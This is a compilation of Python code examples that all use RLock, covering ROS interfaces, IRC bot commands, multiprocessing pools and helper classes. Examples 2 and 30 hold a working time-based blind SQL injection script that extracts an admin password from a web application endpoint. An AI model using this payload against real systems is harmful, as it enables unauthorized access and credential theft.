Example no. 1
class ROSMulti(object):
    """ Experimental ros interface wrapping the complexities of communicating with multiple ros masters """
    """ Creates a new process, configured with the appropriate variables and uses pipes to relay data """
    """ to and from the current process.  The hope is to stablise this to the point that it can """
    """ replace direct calls to rosHelper, allowing for communication and control of multiple robots """
    """ from the same top level process. """
    def __init__(self, version=None, packagePath=None, packageName=None, rosMaster=None, overlayPath=None):
        localPipe, remotePipe = Pipe()
        self._pipe = localPipe
        self._rosRemote = _RosMulti(version, rosMaster, overlayPath, remotePipe)
        self._rosRemote.start()
        self._pipeLock = RLock()
    
    def __del__(self):
        self._pipe.close()
    
    def getSingleMessage(self, topic, retryOnFailure=1, timeout=None):
        msg = Message('getSingleMessage', {'topic':topic, 'retryOnFailure':retryOnFailure, 'timeout':timeout})
        return self._send(msg)
        
    def getTopics(self, baseFilter='', exactMatch=False):
        msg = Message('getTopics', {'baseFilter':baseFilter, 'exactMatch':exactMatch})
        return self._send(msg)

    def getMessageType(self, topic):
        msg = Message('getMessageType', {'topic':topic})
        return self._send(msg)
    
    def getParam(self, paramName):
        msg = Message('getParam', {'paramName': paramName})
        return self._send(msg)
    
    def _send(self, msg):
        self._pipeLock.acquire()
        try:
            self._pipe.send(msg)
            try:
                ret = self._pipe.recv()
            except EOFError:
                return None
            
            if isinstance(ret, Exception):
                raise ret
            else:
                return ret
        finally:
            self._pipeLock.release()
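A minimal usage sketch for the wrapper above; the master URI, version string, and topic name are illustrative assumptions, not values from the original code:

ros = ROSMulti(version='indigo', rosMaster='http://robot-a:11311')  # hypothetical master
topics = ros.getTopics(baseFilter='/rosout')            # call is proxied over the pipe
message = ros.getSingleMessage('/rosout', timeout=5.0)  # returns None if the pipe hits EOF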
Example no. 2
class GuessPassword(object):
    def __init__(self, passwd_length, processes=6, timeout=3):
        self.result = Manager().dict()
        self.stop_flag = Manager().list()
        self.worker_list = []
        self.processes = processes
        self.timeout = timeout
        self.queue = Queue()
        self.lock = RLock()
        self.cookie = {'_SERVER': ''}
        self.passwd_length = passwd_length
        self.url = "http://localhost/general/document/index.php/send/approve/finish"
        self.payload = "1) and char(@`'`)  union select if(ord(mid(PASSWORD,{position},1))={guess_char},sleep(4),1),1 from user WHERE BYNAME = 0x61646d696e #and char(@`'`)"

        self.stop_flag.append(False)  # can't be written as self.stop_flag[0] = False here; on an empty Manager list that raises an index-out-of-range error
        for _ in range(1, self.passwd_length):
            self.queue.put(_)

    def exploit(self):
        while not self.queue.empty() and not self.stop_flag[0]:
            passwd_position = self.queue.get()
            for _guess_char in range(33, 128):
                payload = self.payload.format(position=passwd_position, guess_char=_guess_char)
                exp_data = {'sid': payload}
                try:
                    res = requests.post(self.url, data=exp_data, cookies=self.cookie, timeout=self.timeout)
                except requests.ReadTimeout:
                    self.lock.acquire()
                    self.result[passwd_position] = chr(_guess_char)
                    print "Data %dth: %s" % (passwd_position, self.result[passwd_position])
                    self.lock.release()
                    break

    def run(self):

        for _ in range(self.processes):
            _worker = Process(target=self.exploit)
            # _worker.daemon = True
            _worker.start()

        try:
            # Why > 2 rather than > 0?  When all worker subprocesses have
            # finished, two child processes are still running: the two Manager
            # server processes used for sharing data across processes.
            # multiprocessing.active_children() returns the list of live children.
            while len(multiprocessing.active_children()) > 2:
                # self.lock.acquire()
                # print len(multiprocessing.active_children())
                # self.lock.release()
                time.sleep(1)
        except KeyboardInterrupt:
            self.lock.acquire()
            print 'wait for all subprocess stop......'
            self.stop_flag[0] = True
            self.lock.release()

        else:
            print self.result
            print 'finish'
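The translated comments above lean on two multiprocessing behaviours worth isolating: a Manager().list() starts empty, so index assignment fails until something is appended, and every Manager() spawns a server child process that active_children() counts. A minimal sketch, using only the stdlib:

import multiprocessing
from multiprocessing import Manager

flag = Manager().list()
# flag[0] = False          # would raise IndexError: list assignment index out of range
flag.append(False)         # seed the slot; afterwards flag[0] = True works fine
print(len(multiprocessing.active_children()))  # >= 1: the Manager's server process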
Example no. 3
class ChannelMutex(object):
    def __init__(self):
        self.reader_mutex = RLock()
        self.writer_mutex = RLock() if os.name != 'nt' else None
        self.acquire = self._make_acquire_method()
        self.release = self._make_release_method()

    def __getstate__(self):
        return self.reader_mutex, self.writer_mutex

    def __setstate__(self, state):
        self.reader_mutex, self.writer_mutex = state
        self.acquire = self._make_acquire_method()
        self.release = self._make_release_method()

    def __enter__(self):
        self.acquire()
        return self

    def __exit__(self, *_):
        self.release()

    def _make_acquire_method(self):
        def unix_acquire():
            self.reader_mutex.acquire()
            self.writer_mutex.acquire()

        def windows_acquire():
            self.reader_mutex.acquire()

        return unix_acquire if os.name != 'nt' else windows_acquire

    def _make_release_method(self):
        def unix_release():
            self.reader_mutex.release()
            self.writer_mutex.release()

        def windows_release():
            self.reader_mutex.release()

        return unix_release if os.name != 'nt' else windows_release

    @property
    @contextmanager
    def reader(self):
        with self.reader_mutex:
            yield self

    @property
    @contextmanager
    def writer(self):
        with self.writer_mutex:
            yield self
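A sketch of how the reader/writer properties above are meant to be used; because each property is wrapped in @contextmanager, every attribute access yields a fresh context:

mutex = ChannelMutex()
with mutex.reader:   # holds only reader_mutex
    pass             # ... read side of the channel ...
with mutex.writer:   # caution: writer_mutex is None on Windows ('nt'),
    pass             # so this variant would fail there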
Example no. 4
class ROS(object):
    def __init__(self, version=None, packagePath=None, packageName=None, rosMaster=None, overlayPath=None):
        localPipe, remotePipe = Pipe()
        self._pipe = localPipe
        self._rosRemote = _RosMulti(version, rosMaster, overlayPath, remotePipe)
        self._rosRemote.start()
        self._pipeLock = RLock()
    
    def __del__(self):
        self._pipe.close()
    
    def getSingleMessage(self, topic, retryOnFailure=1, timeout=None):
        msg = Message('getSingleMessage', {'topic':topic, 'retryOnFailure':retryOnFailure, 'timeout':timeout})
        return self._send(msg)
        
    def getTopics(self, baseFilter='', exactMatch=False):
        msg = Message('getTopics', {'baseFilter':baseFilter, 'exactMatch':exactMatch})
        return self._send(msg)

    def getMessageType(self, topic):
        msg = Message('getMessageType', {'topic':topic})
        return self._send(msg)
    
    def _send(self, msg):
        self._pipeLock.acquire()
        try:
            self._pipe.send(msg)
            try:
                ret = self._pipe.recv()
            except EOFError:
                return None
            
            if isinstance(ret, Exception):
                raise ret
            else:
                return ret
        finally:
            self._pipeLock.release()
Example no. 5
 def __init__(self, bot):
     super(AddMember, self).__init__(
         bot=bot,
         priority='low',
         threaded=True,
         rule=([
             'add_member',
             'dodaj clana',
         ], r'(\S+) +(.+)'),
         name='add_member',
         doc='Add member to the army',
         example='.add_member zdrug Hostilian',
     )
     if not hasattr(bot, 'armies_lock'):
         bot.armies_lock = RLock()
Example no. 6
def run_jobs(arguments: List, func: Callable, num_processes=5) -> List:
    """
    Run a function with n-process. The list of arguments correspond to arguments to the function, these are splitted in
    n-process chunks.
    """
    arguments = chunker_list(arguments, num_processes)
    with Pool(processes=num_processes,
              initargs=(RLock(), ),
              initializer=tqdm.set_lock) as pool:
        jobs = [
            pool.apply_async(run, args=(pid, func, arg))
            for pid, arg in enumerate(arguments)
        ]
        result_list = [job.get() for job in jobs]
    return sum(result_list, [])
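run_jobs passes RLock() through initializer=tqdm.set_lock so that tqdm bars in different worker processes share one lock and their terminal output does not interleave. The function also leans on two helpers not shown in this excerpt; a plausible minimal sketch of them (names kept, bodies assumed) is:

from typing import Callable, List

def chunker_list(seq: List, num_chunks: int) -> List[List]:
    # deal items round-robin so every process receives a similar-sized chunk
    return [seq[i::num_chunks] for i in range(num_chunks)]

def run(pid: int, func: Callable, args: List) -> List:
    # apply func to each argument in this process's chunk
    return [func(a) for a in args]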
Example no. 7
    def __init__(self, file='control.log',
                 stream=sys.stdout,
                 level=logging.INFO):
        self.logger = logging.getLogger('ExperimentControl')

        stream_hdlr = logging.StreamHandler(stream=stream)
        file_hdlr = logging.FileHandler(file)
        stream_hdlr.setFormatter(self.STREAM_LOG_FMT)
        file_hdlr.setFormatter(self.FILE_LOG_FMT)

        self.logger.addHandler(stream_hdlr)
        self.logger.addHandler(file_hdlr)
        self.logger.setLevel(level)

        self.lock = RLock()
Example no. 8
 def __init__(self, task):
     self._task = task
     # notice the double link; this is important since the Artifact
     # dictionary needs to signal the Artifacts object about changes
     self._artifacts_container = self._ProxyDictWrite(self)
     self._last_artifacts_upload = {}
     self._unregister_request = set()
     self._thread = None
     self._flush_event = Event()
     self._exit_flag = False
     self._summary = ''
     self._temp_folder = []
     self._task_artifact_list = []
     self._task_edit_lock = RLock()
     self._storage_prefix = None
Example no. 9
def scp_operation(args):
    credentials = Credentials()
    targets = args.hostname.split(",")
    tqdm.set_lock(RLock())
    with Pool(initializer=tqdm.set_lock, initargs=(tqdm.get_lock(), )) as pool:
        pool.starmap(
            scp_process,
            zip(
                targets,
                repeat(credentials),
                repeat(args.filename),
                repeat(args.dst_file_path),
                list(range(len(targets))),
            ),
        )
Example no. 10
    def __init__(self):
        self.df_to_tp = dict()
        self.attached_dataframes = set()
        self.all_types_dataframes = set()
        self.tp_to_attached_df = dict()
        self.queues = dict()
        self.type_map = dict()
        self.add_lock = RLock()
Example no. 11
 def __init__(self, bot):
     super(RemoveGeneral, self).__init__(
         bot=bot,
         priority='low',
         threaded=True,
         rule=([
             'remove_general',
             'izbaci generala',
         ], r'(\S+) +(\S+)'),
         name='remove_general',
         doc='Remove general of the army (by IRC name)',
         example='.remove_general zdrug Hostilian',
     )
     if not hasattr(bot, 'armies_lock'):
         bot.armies_lock = RLock()
Example no. 12
    def __init__(self, *args, **kwargs):
        self._args = args
        self._kwargs = kwargs
        self._connection = None
        self._closed = False
        self._close_callback = None
        self._io_loop = kwargs.pop('io_loop', None)

        self.__cursor_lock = RLock()

        if self._io_loop is None:
            self._io_loop = IOLoop.current()

        if "cursorclass" in kwargs and issubclass(kwargs["cursorclass"], Cursor):
            kwargs["cursorclass"] = kwargs["cursorclass"].__delegate_class__
Example no. 13
def create_reservation(product_id, customer_id):
    locks = current_app.locks['products']

    if product_id not in locks:
        locks[product_id] = RLock()

    with locks[product_id]:
        cache = current_app.cache
        reservation = Reservation(product_id=product_id,
                                  customer_id=customer_id)
        reservations = Reservation.all()
        reservations[reservation.id] = reservation
        current_app.cache.set('reservations', reservations)

    return reservation
Example no. 14
 def __init__(self, bot):
     super(SetOrder, self).__init__(
         bot=bot,
         priority='low',
         threaded=True,
         rule=([
             'set_order',
             'postavi naredjenje',
         ], r'(\S+) +(.+)'),
         name='set_order',
         doc='Set the order for the army',
         example='.set_order zdrug Shoot for eSerbia in ...',
     )
     if not hasattr(bot, 'armies_lock'):
         bot.armies_lock = RLock()
Example no. 15
 def __init__(self, bot):
     super(RemoveMember, self).__init__(
         bot=bot,
         priority='low',
         threaded=True,
         rule=([
             'remove_member',
             'izbaci clana',
         ], r'(\S+) +(.+)'),
         name='remove_member',
         doc='Remove member from the army',
         example='.remove_member zdrug Hostilian',
     )
     if not hasattr(bot, 'armies_lock'):
         bot.armies_lock = RLock()
Example no. 16
 def __init__(self, bot):
     super(UnbindChannel, self).__init__(
         bot=bot,
         priority='low',
         threaded=True,
         rule=([
             'unbind_channel',
             'odvezi kanal',
         ], r'(\S+) +(\S+)'),
         name='unbind_channel',
         doc='Unbind the channel from the army',
         example='.unbind_channel zdrug #zdrug',
     )
     if not hasattr(bot, 'armies_lock'):
         bot.armies_lock = RLock()
Example no. 17
def Array(typecode_or_type, size_or_initializer, **kwds):
    '''
    Return a synchronization wrapper for a RawArray
    '''
    lock = kwds.pop('lock', None)
    if kwds:
        raise ValueError('unrecognized keyword argument(s): %s' % kwds.keys())
    obj = RawArray(typecode_or_type, size_or_initializer)
    if lock is False:
        return obj
    if lock in (True, None):
        lock = RLock()
    if not hasattr(lock, 'acquire'):
        raise AttributeError("'%r' has no method 'acquire'" % lock)
    return synchronized(obj, lock)
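This is essentially the stdlib multiprocessing.sharedctypes.Array factory: with lock=True or lock=None the returned wrapper exposes its RLock via get_lock(). A short usage sketch against the stdlib version:

from multiprocessing import Array

arr = Array('i', 8)              # synchronized wrapper, safe across processes
with arr.get_lock():             # take the lock explicitly for compound updates
    arr[0] += 1
raw = Array('i', 8, lock=False)  # plain RawArray: no lock, caller synchronizes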
Example no. 18
def click_stream():
    global FILE_JSON_SIZE, BLOCK_SIZE, WORKERS, FILE_JSON_NAME
    get_file_size(FILE_JSON_NAME)  # get the file size
    BLOCK_SIZE = FILE_JSON_SIZE / WORKERS  # file size divided by 24 gives the size of each BLOCK_SIZE
    read_lock = RLock()  # from multiprocessing import Process, Array, RLock
    array = Array('l', WORKERS)  # guess: this is meant to split the work into 23 processes
    process = []
    for i in range(WORKERS):
        p = Process(target=process_found,
                    args=[i, array, read_lock])  # lock: without a lock, output from different processes gets mixed together
        process.append(p)  # split the file into 23 txt files
    for i in range(WORKERS):
        process[i].start()
    for i in range(WORKERS):
        process[i].join()
Example no. 19
 def __init__(self, bot):
     super(AddGeneral, self).__init__(
         bot=bot,
         priority='low',
         threaded=True,
         rule=([
             'add_general',
             'dodaj generala',
         ], r'(\S+) +(\S+)'),
         name='add_general',
         doc='Add general of the army (by IRC name)',
         example='.add_general zdrug Hostilian',
     )
     if not hasattr(bot, 'armies_lock'):
         bot.armies_lock = RLock()
Example no. 20
    def __init__(self, topic):
        self._error_deltas = []
        self._last_error = None
        self._last_error_stamp = None
        self._error_lock = RLock()

        self.pub_gripper_command = rospy.Publisher(f'{topic}/command',
                                                   Pr2GripperCommandMsg,
                                                   queue_size=1,
                                                   tcp_nodelay=True)
        self.sub_gripper_state = rospy.Subscriber(
            f'{topic}/state',
            JointControllerStateMsg,
            callback=self._cb_gripper_feedback,
            queue_size=1)
Example no. 21
def main():
    from_zoom = 9
    to_zoom = 14
    num_processes = to_zoom - from_zoom + 1

    pool = Pool(processes=num_processes,
                initargs=(RLock(), ),
                initializer=tqdm.set_lock)
    jobs = [
        pool.apply_async(exportTiles, args=(z, z - from_zoom))
        for z in range(from_zoom, to_zoom + 1)
    ]
    pool.close()
    result_list = [job.get() for job in jobs]
    print("\n" * (num_processes * 2))
Example no. 22
 def __init__(self, bot):
     super(Order, self).__init__(
         bot=bot,
         priority='low',
         threaded=True,
         commands=[
             'order',
             'naredjenje',
         ],
         name='order',
         doc='Get the order for the army',
         example='.order',
     )
     if not hasattr(bot, 'armies_lock'):
         bot.armies_lock = RLock()
Example no. 23
def debug():
    db = storage.init_database('mongo', 'wikilytics', 'enwiki_charts')
    #db.add_son_manipulator(Transform())

    lock = RLock()
    v = Variable('test', 'year', lock, {})

    for x in xrange(100000):
        year = random.randrange(2005, 2010)
        month = random.randrange(1, 12)
        day = random.randrange(1, 28)
        d = datetime.datetime(year, month, day)
        x = random.randrange(1, 10000)
        v.add(d, x, {'username': '******'})
    gc.collect()
Example no. 24
    def __init__(self, km, 
                       robot_command_processor, 
                       gripper_wrapper,
                       robot_prefix,
                       eef_path, ext_paths, 
                       controlled_symbols, cam_path=None,
                       weights=None, resting_pose=None,
                       navigation_method='linear', visualizer=None):
        self.km = km
        self.robot_command_processor = robot_command_processor
        self.robot_prefix = robot_prefix
        self.gripper_wrapper = gripper_wrapper
        self.eef_path = eef_path
        self.cam_path = cam_path

        self.visualizer    = visualizer
        self.weights       = weights
        self.controlled_symbols = controlled_symbols
        self.navigation_method  = navigation_method

        self.controller = None

        self._phase = 'homing'

        self._state_lock = RLock()
        self._state = {}
        self._target_map = {}
        self._target_body_map  = {}
        self._last_controller_update = None

        self._current_target = None
        self._last_external_cmd_msg = None
        self._robot_state_update_count = 0

        self._idle_controller = IdleController(km, 
                                               self.controlled_symbols,
                                               resting_pose,
                                               cam_path)

        self._build_ext_symbol_map(km, ext_paths)

        self.pub_external_command = rospy.Publisher('~external_command', ValueMapMsg, queue_size=1, tcp_nodelay=True)
        self.sub_external_js = rospy.Subscriber('~external_js',  ValueMapMsg, callback=self.cb_external_js, queue_size=1)
        self.robot_command_processor.register_state_cb(self.cb_robot_js)

        self._kys = False
        self._behavior_thread = threading.Thread(target=self.behavior_update)
        self._behavior_thread.start()
Example no. 25
def Value(typecode_or_type, *args, **kwds):
    """
    Return a synchronization wrapper for a Value
    """
    lock = kwds.pop('lock', None)
    if kwds:
        raise ValueError('unrecognized keyword argument(s): %s' % kwds.keys())
    obj = RawValue(typecode_or_type, *args)
    if lock is False:
        return obj
    else:
        if lock in (True, None):
            lock = RLock()
        if not hasattr(lock, 'acquire'):
            raise AttributeError("'%r' has no method 'acquire'" % lock)
        return synchronized(obj, lock)
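As with Array above, this mirrors the stdlib multiprocessing.Value factory. counter.value += 1 is a read-modify-write, so compound updates still need the wrapper's lock:

from multiprocessing import Value

counter = Value('i', 0)
with counter.get_lock():   # get_lock() returns the RLock installed by the factory
    counter.value += 1     # not atomic without the lock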
Example no. 26
 def __init__(self, bot):
     super(ListMembers, self).__init__(
         bot=bot,
         priority='low',
         threaded=True,
         commands=[
             'list_members',
             'ls',
             'izlistaj clanove',
         ],
         name='list_members',
         doc='List members of the army',
         example='.list_members',
     )
     if not hasattr(bot, 'armies_lock'):
         bot.armies_lock = RLock()
Example no. 27
 def __init__(self, interval=1, collect_load=False, use_thread=False):
     self._event_start_collect_metrics = Event()
     self._event_stop = Event()
     self._tflops = Value('d', 0.0)
     self._cpu_tflops = Value('d', 0.0)
     self._gpu_tflops = Value('d', 0.0)
     self._pid = Value('i', 0)
     self._tflops_lock = RLock()
     self.interval = interval
     self._process = None
     self._start_timestamp = None
     self._end_timestamp = None
     self._collect_load = collect_load
     self._use_thread = use_thread
     self._cpu_loads = []
     self._gpu_loads = []
Example no. 28
    def __init__(self, connection_specification, hypothesis_id, chunk_size=6500, n_processes=4,
                 glycan_combination_count=None, glycan_limit=_DEFAULT_GLYCAN_STEP_LIMIT):
        self.n_processes = n_processes
        self.connection_specification = connection_specification
        self.chunk_size = chunk_size
        self.hypothesis_id = hypothesis_id
        self.glycan_combination_count = glycan_combination_count
        self.current_glycan_offset = 0
        self.glycan_limit = glycan_limit

        self.input_queue = Queue(10)
        self.output_queue = Queue(1000)
        self.workers = []
        self.dealt_done_event = Event()
        self.ipc_controller = self.ipc_logger()
        self.database_mutex = RLock()
Example no. 29
def main():
    global FILE_SIZE, BLOCK_SIZE, WORKERS, FILE_NAME
    getFilesize(FILE_NAME)
    BLOCK_SIZE = FILE_SIZE / WORKERS
    print FILE_SIZE, BLOCK_SIZE
    rlock = RLock()
    array = Array('l', WORKERS)
    array[0] = 0
    process = []
    for i in range(WORKERS):
        p = Process(target=process_found, args=[i, array, rlock])
        process.append(p)
    for i in range(WORKERS):
        process[i].start()
    for i in range(WORKERS):
        process[i].join()
Example no. 30
    def __init__(self, passwd_length, processes=6, timeout=3):
        self.result = Manager().dict()
        self.stop_flag = Manager().list()
        self.worker_list = []
        self.processes = processes
        self.timeout = timeout
        self.queue = Queue()
        self.lock = RLock()
        self.cookie = {'_SERVER': ''}
        self.passwd_length = passwd_length
        self.url = "http://localhost/general/document/index.php/send/approve/finish"
        self.payload = "1) and char(@`'`)  union select if(ord(mid(PASSWORD,{position},1))={guess_char},sleep(4),1),1 from user WHERE BYNAME = 0x61646d696e #and char(@`'`)"

        self.stop_flag.append(False)  # can't be written as self.stop_flag[0] = False here; on an empty Manager list that raises an index-out-of-range error
        for _ in range(1, self.passwd_length):
            self.queue.put(_)
Example no. 31
def run_tests_from_generator(generator, nb_of_cores=3):
    tests = generator
    if nb_of_cores > 1:
        if len(tests) == 0:
            print("already calculated")
            return
        print("running with {} cores".format(nb_of_cores))
        with Pool(nb_of_cores, initializer=tqdm.set_lock,
                  initargs=(RLock(), )) as pool:
            results = pool.imap(run_test, tests)
            for _ in tqdm(results, total=len(tests)):
                pass
    else:
        print("running sequentially on single core")
        for test in tqdm(tests):
            run_test(test)
Example no. 32
class Singleton(type):
    _instances = {}
    _singleton_lock = RLock()

    def __call__(cls, *args, **kwargs):
        if cls not in cls._instances:
            with cls._singleton_lock:
                if cls not in cls._instances:
                    cls._instances[cls] = super(Singleton,
                                                cls).__call__(*args, **kwargs)
        return cls._instances[cls]

    def clear(cls):
        try:
            del Singleton._instances[cls]
        except KeyError:
            pass
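A brief demonstration of the metaclass (Python 3 syntax; Config is an illustrative class, not from the original). The double-checked pattern above, test, lock, test again, keeps the common already-created path lock-free while still serialising first construction:

class Config(metaclass=Singleton):
    def __init__(self):
        self.values = {}

a = Config()
b = Config()
assert a is b    # both names refer to the single cached instance
Config.clear()   # metaclass method: drop the cached instance so the next call rebuilds it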
Example no. 33
def update_product(product_id, **data):
    if product_id not in current_app.locks['products']:
        current_app.locks['products'][product_id] = RLock()

    with current_app.locks['products'][product_id]:
        product = Product.get(id=product_id)
        data = _get_validated_product_data(**data)

        for k, v in data.items():
            if k in product.as_dict():
                product.__dict__[k] = v

        products = current_app.cache.get('products')
        products[product_id] = product
        current_app.cache.set('products', products)

    return product
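One caveat that applies to both create_reservation and update_product: the "if product_id not in locks" check followed by the assignment is itself a check-then-act race between threads, so two threads can briefly install different locks. A hedged alternative (assuming threading.RLock and the same Flask-style app object) uses dict.setdefault, which is a single operation on a built-in dict:

from threading import RLock

def get_product_lock(app, product_id):
    # two threads racing here still end up sharing one lock object,
    # because setdefault inserts-or-returns in one dict operation
    return app.locks['products'].setdefault(product_id, RLock())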
Example no. 34
 def to_csv(self, filename):
     data = data_converter.convert_dataset_to_lists(self, 'manage')
     headers = data_converter.add_headers(self)
     lock = RLock()
     fh = file_utils.create_txt_filehandle(settings.dataset_location,
                                           filename, 'w', 'utf-8')
     file_utils.write_list_to_csv(headers,
                                  fh,
                                  recursive=False,
                                  newline=True)
     file_utils.write_list_to_csv(data,
                                  fh,
                                  recursive=False,
                                  newline=True,
                                  format=self.format,
                                  lock=lock)
     fh.close()
Example no. 35
 def __init__(self, tg_client: TelegramClient, character: Character):
     super().__init__()
     self._tgClient = tg_client
     self._character = character
     self._send_queue = []
     self._lock = RLock()
     self._dialogs = self._tgClient.get_dialogs(100)
     self._cwBot = self._find_contact_by_username(config.CWBot)
     if not self._cwBot:
         self._cwBot = self._tgClient.invoke(SearchRequest(config.CWBot,
                                                           1)).users[0]
         self._tgClient.send_message(self._cwBot, '/start')
         self._tgClient.send_message(self._cwBot, '🇬🇵Черный замок🇬🇵')
     self._captchaBot = self._find_contact_by_username(config.CaptchaBot)
     if not self._captchaBot:
         self._captchaBot = self._tgClient.invoke(
             SearchRequest(config.CaptchaBot, 1)).users[0]
         self._tgClient.send_message(self._captchaBot, '/start')
     self._tradeBot = self._find_contact_by_username(config.TradeBot)
     if not self._tradeBot:
         self._tradeBot = self._tgClient.invoke(
             SearchRequest(config.TradeBot, 1)).users[0]
         self._tgClient.send_message(self._tradeBot, '/start')
     self._orderBot = self._find_contact_by_username(
         self._character.config.orderBot)
     if not self._orderBot:
         self._orderBot = self._tgClient.invoke(
             SearchRequest(self._character.config.orderBot, 1)).users[0]
         self._tgClient.send_message(self._orderBot, '/start')
     self._dataBot = self._find_contact_by_username(
         self._character.config.dataBot)
     if not self._dataBot:
         self._dataBot = self._tgClient.invoke(
             SearchRequest(self._character.config.dataBot, 1)).users[0]
         self._tgClient.send_message(self._dataBot, '/start')
     self._admin = self._find_contact_by_username(
         self._character.config.admin)
     if not self._admin:
         self._admin = self._tgClient.invoke(SearchRequest(self._character.config.admin, 1)).users[0] if \
             len(self._tgClient.invoke(SearchRequest(self._character.config.admin, 1)).users) else None
     self._orderGroup = self._find_contact_by_name(
         self._character.config.orderChat)
     if not self._admin:
          # If the admin user wasn't found, we act as admin ourselves
         self._admin = self._tgClient.session.user
     self._tgClient.add_update_handler(self._locked_receive)
Example no. 36
    def __init__(self,
                 agents: Sequence[Agent],
                 environments: Sequence[Env],
                 shared_observers: Optional[Sequence[callable]] = None,
                 max_timesteps: int = math.inf,
                 max_episodes: int = math.inf,
                 max_seconds: float = math.inf,
                 render_ids=None):

        super(AsynchronousParallelRunner, self).__init__()

        self._running = Value("b", False)

        self._num_processes = len(agents)
        self._agents = agents
        self._environments = environments

        self._max_timesteps = max_timesteps
        self._max_episodes = max_episodes
        self._max_seconds = max_seconds

        self._total_steps = Value("i", 0)
        self._total_episodes = Value("i", 0)

        self._start_time = Value("f", 0)

        def increment(counter, value):
            counter.value += value

        steps_counter = lambda timestep: increment(self._total_steps, 1)
        episodes_counter = lambda timestep: increment(self._total_episodes,
                                                      timestep.is_terminal)

        render_ids = render_ids or []
        render_lock = RLock() if len(render_ids) > 1 else None

        shared_observers = shared_observers or []

        self._runners = [
            Runner(agent=agents[i],
                   environment=environments[i],
                   observers=shared_observers +
                   [steps_counter, episodes_counter],
                   render=i in render_ids,
                   render_lock=render_lock) for i in range(self._num_processes)
        ]
Example no. 37
 def __init__(self, email, password, update_interval, baseurl=""):
     self.__connection = Connection(email, password, baseurl)
     self.__vehicles = []
     self.update_interval = update_interval
     self.__car = {}
     self.__last_update_time = 0
     self.__lock = RLock()
     self.update()
     for car_id, car in self.__car.items():
         self.__vehicles.append(Fuel(car, self))
         self.__vehicles.append(GPS(car, self))
         self.__vehicles.append(Odometer(car, self))
         self.__vehicles.append(SystemsAreOkSensor(car, self))
         self.__vehicles.append(OilLevelIsOkSensor(car, self))
         self.__vehicles.append(TirePressureIsOkSensor(car, self))
         self.__vehicles.append(BatteryChargeIsOkSensor(car, self))
         self.__vehicles.append(LockSensor(car, self))
Example no. 38
class SafeWatchedFileHandler(WatchedFileHandler):
    def __init__(self, filename, mode="a", encoding=None, delay=0):
        WatchedFileHandler.__init__(self, filename, mode, encoding, delay)
        self._lock = RLock()

    def close(self):
        self._lock.acquire(timeout=2)
        try:
            WatchedFileHandler.close(self)

        finally:
            self._lock.release()

    def emit(self, record):
        self._lock.acquire(timeout=2)
        try:
            WatchedFileHandler.emit(self, record)

        finally:
            self._lock.release()
Example no. 39
    def __init__(self, verbose, recursive, threads, includePattern, excludePattern, overwrite, overwriteIfSrcNewer, metadataonly, src, dst, converterType='FFMpeg', srcParams='', dstParams='', srcExt='flac', dstExt='mp3'):
        '''
        Constructor
        '''
        ':type recursive: boolean'
        ':type includePattern: String'
        ':type excludePattern: String'
        ':type threads: int'
        ':type src: String'
        ':type src: String'
        ':type dstExt: String'
        ':type dstExt: String'
        ':type overwrite: String'
        ':type overwriteIfSrcNewer: String'
        self.__verbose = verbose
        self.__recursive = recursive
        self.__includePattern = includePattern
        self.__excludePattern = excludePattern
        self.__threads = threads
#         print ("src="+src)
#         print ("dst="+dst)
        self.__src = Path(src)
        self.__dst = Path(dst)
        self.__srcExt = srcExt
        self.__dstExt = dstExt
        self.__coverExtList = ['jpg', 'jpeg', 'bmp', 'png', 'gif']
        #self.__executer = ProcessPoolExecutor(max_workers=threads)
        self.__executer = ThreadPoolExecutor(max_workers=threads)
        self.__futures = []
        self.__futureEvents = {}
        self.__instance = self
        self.__mutex = RLock()
        self.__evInterrupted = Event()
        self.__overwrite = overwrite
        self.__overwriteIfSrcNewer = overwriteIfSrcNewer
        self.__metadataonly = metadataonly
        self.__converter = MusicLibraryConverterBackendFactory(converterType, srcParams, dstParams)
        if self.__converter is None or not self.__converter.backendFound():
            raise ConverterBackendNotFoundException(converterType)
Example no. 40
 def __init__(self, port=1, baudrate=115200, log=False):
     self.__keywords = []
     self.monitor_string = None
     self.__port = port
     self.__serial = serial.serial_for_url(
         "COM{num}".format(num=self.__port),
         baudrate,
         parity="N",
         rtscts=False,
         xonxoff=False,
         timeout=1,
         do_not_open=True,
     )
     self.__serial.open()
     self.__serial_io = io.TextIOWrapper(io.BufferedRWPair(self.__serial, self.__serial))
     self.__cmd_queue = Queue()
     self.__rx_thread = threading.Thread(target=self.__read_thread, name="rx_thread")
     self.__rx_thread.setDaemon(True)
     self.__rx_thread.start()
     self.__tx_thread = threading.Thread(target=self.__write_thread, name="tx_thread")
     self.__tx_thread.setDaemon(True)
     self.__tx_thread.start()
     self.__mutex = RLock()
     self.__log = log
     self.__is_monitor_rx_enable = False
     self.__echo_method = None
     if log is True:
         ltime = time.localtime(time.time())
         logging.basicConfig(
             filename="log_{mon}_{date}_{h}_{m}_{s}.txt".format(
                 mon=str(ltime.tm_mon).zfill(2),
                 date=str(ltime.tm_mday).zfill(2),
                 h=str(ltime.tm_hour).zfill(2),
                 m=str(ltime.tm_min).zfill(2),
                 s=str(ltime.tm_sec).zfill(2),
             ),
             level=logging.DEBUG,
         )
Example no. 41
class UsbCon():
    """
    USBTMC BACKEND
    A wrapper of the usbtmc library.  The idea is that I can create an
        abstraction layer so that in the future, I can write other backends
        to support other os's.  May need to make a pyvisa backend, for example.
    """
    def __init__(self, idProduct=None, idVendor=None):
        """
        """
        self.lock = RLock()
        self.instr = self.connect(idProduct, idVendor)
        print("Asking *IDN? returns: {}".format(self.ask("*IDN?")))

    def connect(self, idProduct=None, idVendor=None):
        """
        if either idProduct or idVendor are None, query the user for what to connect to.
        """
        if idProduct is None or idVendor is None:
            for i, dev in enumerate(usbtmc.list_devices()):
                print("{}: {} - {}".format(i + 1, dev.manufacturer, dev.product))
            dev_con = raw_input("Enter the number of the device you want to connect to: ")
            dev_chosen = usbtmc.list_devices()[int(dev_con) - 1]
            product_id = dev_chosen.idProduct
            vendor_id = dev_chosen.idVendor
        else:
            product_id, vendor_id = idProduct, idVendor
        for dev in usbtmc.list_devices():
            if dev.idProduct == product_id and dev.idVendor == vendor_id:
                if dev.is_kernel_driver_active(0):
                    dev.detach_kernel_driver(0)
        instr = usbtmc.Instrument(vendor_id, product_id)
        return instr

    def read(self, num=-1, encoding="utf-8"):
        """
        Wrapping around the read method in usbtmc.Instrument
        """
        self.lock.acquire()
        msg = self.instr.read(num, encoding)
        self.lock.release()
        return msg

    def write(self, message, encoding="utf-8"):
        """
        Wrapping around the write method in usbtmc.Instrument
        """
        self.lock.acquire()
        msg = self.instr.write(message, encoding)
        self.lock.release()
        return msg

